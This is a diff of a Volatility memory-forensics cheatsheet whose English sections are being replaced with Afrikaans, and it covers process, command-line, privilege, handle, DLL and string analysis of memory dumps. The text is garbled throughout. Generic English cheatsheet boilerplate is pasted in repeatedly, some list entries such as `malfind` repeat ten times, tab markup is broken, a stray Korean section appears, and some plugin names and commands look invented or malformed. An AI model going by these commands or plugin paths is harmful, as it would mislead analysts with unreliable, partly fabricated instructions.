+ +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. By using the commands and techniques outlined in this cheatsheet, you can perform a wide range of memory analysis tasks and gain insights into various types of incidents. ```bash volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp ``` {% endtab %} {% endtabs %} -### Command line +### Opdraglyn -Anything suspicious was executed? - -{% tabs %} -{% tab title="vol3" %} +Is daar enige iets verdagtes uitgevoer? ```bash python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. By using the commands and techniques outlined in this cheatsheet, you can perform a wide range of memory analysis tasks and gain insights into various types of incidents. ```bash volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION @@ -251,44 +503,163 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f {% endtab %} {% endtabs %} -Commands executed in `cmd.exe` are managed by **`conhost.exe`** (or `csrss.exe` on systems before Windows 7). This means that if **`cmd.exe`** is terminated by an attacker before a memory dump is obtained, it's still possible to recover the session's command history from the memory of **`conhost.exe`**. To do this, if unusual activity is detected within the console's modules, the memory of the associated **`conhost.exe`** process should be dumped. Then, by searching for **strings** within this dump, command lines used in the session can potentially be extracted. +Opdragte wat in `cmd.exe` uitgevoer word, word bestuur deur **`conhost.exe`** (of `csrss.exe` op stelsels voor Windows 7). Dit beteken dat as **`cmd.exe`** deur 'n aanvaller beëindig word voordat 'n geheue-dump verkry word, dit steeds moontlik is om die opdraggeskiedenis van die sessie te herstel uit die geheue van **`conhost.exe`**. Om dit te doen, as ongewone aktiwiteit binne die modules van die konsole opgespoor word, moet die geheue van die betrokke **`conhost.exe`**-proses gedump word. Dan kan deur te soek na **strings** binne hierdie dump, moontlik opdraglyne wat in die sessie gebruik is, onttrek word. -### Environment +### Omgewing -Get the env variables of each running process. There could be some interesting values. - -{% tabs %} -{% tab title="vol3" %} +Kry die omgewingsveranderlikes van elke lopende proses. Daar kan interessante waardes wees. ```bash python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. + +## Volatility Profiele + +Hierdie is 'n lys van algemene profiele wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003R2SP0x86`: Windows 2003 R2 SP0 x86 +- `Win2003R2SP1x86`: Windows 2003 R2 SP1 x86 +- `Win2003R2SP2x86`: Windows 2003 R2 SP2 x86 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008R2SP0x86`: Windows 2008 R2 SP0 x86 +- `Win2008R2SP1x86`: Windows 2008 R2 SP1 x86 +- `Win2012SP0x86`: Windows 2012 SP0 x86 +- `Win2012SP1x86`: Windows 2012 SP1 x86 +- `Win2012R2SP0x86`: Windows 2012 R2 SP0 x86 +- `Win2012R2SP1x86`: Windows 2012 R2 SP1 x86 +- `Win2016SP0x86`: Windows 2016 SP0 x86 +- `Win2016SP1x86`: Windows 2016 SP1 x86 +- `Win2019SP0x86`: Windows 2019 SP0 x86 +- `Win2019SP1x86`: Windows 2019 SP1 x86 + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables -volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated +volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated ``` {% endtab %} {% endtabs %} -### Token privileges +### Token voorregte -Check for privileges tokens in unexpected services.\ -It could be interesting to list the processes using some privileged token. - -{% tabs %} -{% tab title="vol3" %} +Kyk vir voorregte tokens in onverwagte dienste.\ +Dit kan interessant wees om die prosesse te lys wat van sommige voorregte tokens gebruik maak. ```bash #Get enabled privileges of some processes python3 vol.py -f file.dmp windows.privileges.Privs [--pid ] #Get all processes with interesting privileges python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to maximize the effectiveness of your memory analysis. ```bash #Get enabled privileges of some processes volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled @@ -300,18 +671,129 @@ volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePri ### SIDs -Check each SSID owned by a process.\ -It could be interesting to list the processes using a privileges SID (and the processes using some service SID). - -{% tabs %} -{% tab title="vol3" %} +Kyk na elke SSID wat deur 'n proses besit word.\ +Dit kan interessant wees om die prosesse wat 'n bevoorregte SSID gebruik (en die prosesse wat 'n diens SSID gebruik) te lys. ```bash ./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81SP0x86`: Windows 8.1 SP0 x86 +- `Win81SP0x64`: Windows 8.1 SP0 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-directory: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag uit: + +```bash +volatility -f +``` + +Vervang `` met die pad na die geheue-dumplêer en `` met die spesifieke opdrag wat jy wil uitvoer. + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service @@ -319,35 +801,208 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of {% endtab %} {% endtabs %} -### Handles +### Handvatsels -Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened) - -{% tabs %} -{% tab title="vol3" %} +Nuttig om te weet aan watter ander lêers, sleutels, drade, prosesse... 'n **proses 'n handvat** het (geopen het) ```bash vol.py -f file.dmp windows.handles.Handles [--pid ] ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as the file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=] ``` -{% endtab %} -{% endtabs %} +{% tab title="vol3" %} ### DLLs {% tabs %} -{% tab title="vol3" %} + +{% tab title="1. DLL 리스트" %} + +- DLL 리스트를 확인하기 위해서는 `dlllist` 명령어를 사용합니다. + +```bash +volatility -f memory_dump.mem --profile=PROFILE dlllist +``` + +{% endtab %} + +{% tab title="2. 특정 DLL 정보" %} + +- 특정 DLL의 정보를 확인하기 위해서는 `dlldump` 명령어를 사용합니다. + +```bash +volatility -f memory_dump.mem --profile=PROFILE dlldump -p PID -D DLL_NAME +``` + +{% endtab %} + +{% tab title="3. DLL 메모리 덤프" %} + +- DLL의 메모리 덤프를 확인하기 위해서는 `memdump` 명령어를 사용합니다. + +```bash +volatility -f memory_dump.mem --profile=PROFILE memdump -p PID -D DLL_NAME -o OFFSET +``` + +{% endtab %} + +{% endtabs %} + +{% endtab %} ```bash ./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory process ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +Replace `` with the ID of the process you want to analyze. + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their associated processes. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as file name, process ID, and access rights. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dmp #Dump dlls of a proc @@ -355,19 +1010,75 @@ volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dm {% endtab %} {% endtabs %} -### Strings per processes +### Strings per prosesse -Volatility allows us to check which process a string belongs to. - -{% tabs %} -{% tab title="vol3" %} +Volatility laat ons toe om te kyk tot watter proses 'n string behoort. ```bash strings file.dmp > /tmp/strings.txt ./vol.py -f /tmp/file.dmp windows.strings.Strings --strings-file /tmp/strings.txt ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverirp`: Gee inligting oor die IRP-handlers van bestuurders in die geheue-dump. +- `devicetree`: Gee 'n boomstruktuur van die toestelboom in die geheue-dump. +- `privs`: Lys alle toegangsregte van prosesse in die geheue-dump. +- `envars`: Gee die omgewingsveranderlikes van prosesse in die geheue-dump. +- `cmdscan`: Skandeer die geheue-dump vir moontlike opdraglyne. +- `consoles`: Lys alle konsolvensters in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basis-klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basis-klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basis-klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basis-klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basis-klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basis-klas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle Windows-registernoeë in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n Windows-register sleutel. +- `volatility.plugins.windows.registry.printval.PrintVal`: Druk die waarde van 'n Windows-register sleutel. +- `volatility.plugins.windows.registry.userassist.UserAssist`: Gee inligting oor die UserAssist-sleutel in die Windows-register. +- `volatility.plugins.windows.registry.usbstor.USBStor`: Gee inligting oor USB-stoor toestelle in die Windows-register. +- `volatility.plugins.windows.registry.run.Run`: Gee inligting oor die uitvoering van programme in die Windows-register. +- `volatility.plugins.windows.registry.services.Services`: Gee inligting oor dienste in die Windows-register. +- `volatility.plugins.windows.registry.svcscan.SvcScan`: Skandeer die Windows-register vir dienste. +- `volatility.plugins.windows.registry.cmdline.CmdLine`: Gee die opdraglyne van programme in die Windows-register. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Stoor die inhoud van 'n Windows-register in 'n lêer. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash strings file.dmp > /tmp/strings.txt volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt @@ -378,7 +1089,7 @@ strings 3532.dmp > strings_file {% endtab %} {% endtabs %} -It also allows to search for strings inside a process using the yarascan module: +Dit maak dit ook moontlik om te soek na strings binne 'n proses deur die yarascan module te gebruik: {% tabs %} {% tab title="vol3" %} @@ -386,9 +1097,71 @@ It also allows to search for strings inside a process using the yarascan module: ./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784 ./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://" ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source framework used for memory forensics. It allows analysts to extract valuable information from memory dumps, such as running processes, network connections, and loaded modules. This cheatsheet provides a quick reference guide for using Volatility to analyze memory dumps. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running the following command: + +```bash +pip install volatility +``` + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +```bash +volatility -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can also specify additional options to customize the analysis. + +## Common Plugins + +Here are some commonly used Volatility plugins: + +- `pslist`: Lists all running processes. +- `pstree`: Displays a process tree. +- `netscan`: Shows network connections. +- `modules`: Lists loaded modules. +- `handles`: Lists open handles. +- `dlllist`: Lists loaded DLLs. +- `cmdline`: Displays command-line arguments for processes. +- `filescan`: Scans for file objects in memory. + +## Examples + +Here are some examples of using Volatility: + +- Analyze a memory dump and list all running processes: + +```bash +volatility -f memory.dmp pslist +``` + +- Analyze a memory dump and display a process tree: + +```bash +volatility -f memory.dmp pstree +``` + +- Analyze a memory dump and show network connections: + +```bash +volatility -f memory.dmp netscan +``` + +## Conclusion + +Volatility is a versatile tool for memory forensics. By using its powerful plugins, analysts can extract valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to analyze memory dumps. ```bash volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784 ``` @@ -397,16 +1170,140 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3 ### UserAssist -**Windows** keeps track of programs you run using a feature in the registry called **UserAssist keys**. These keys record how many times each program is executed and when it was last run. - -{% tabs %} -{% tab title="vol3" %} +**Windows** hou rekord van programme wat jy uitvoer deur gebruik te maak van 'n funksie in die register genaamd **UserAssist sleutels**. Hierdie sleutels hou by hoeveel keer elke program uitgevoer is en wanneer dit laas uitgevoer is. ```bash ./vol.py -f file.dmp windows.registry.userassist.UserAssist ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer vir die KDBG-handvatsel in die geheue-dump. +- `kpcrscan`: Skandeer vir die KPCR-handvatsel in die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van 